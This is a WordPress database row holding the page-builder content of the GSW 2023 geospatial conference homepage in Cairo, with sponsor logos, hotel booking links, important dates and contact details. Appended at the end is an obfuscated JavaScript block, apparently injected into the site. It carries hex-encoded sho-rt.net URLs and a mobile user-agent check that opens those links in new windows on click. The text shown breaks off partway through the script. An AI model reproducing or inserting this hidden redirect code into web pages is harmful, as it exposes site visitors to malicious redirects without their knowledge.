(4526,1,'2023-05-17 05:19:30','2023-05-17 05:19:30','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner]\r\n\r\n[vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOUR HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"]\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( 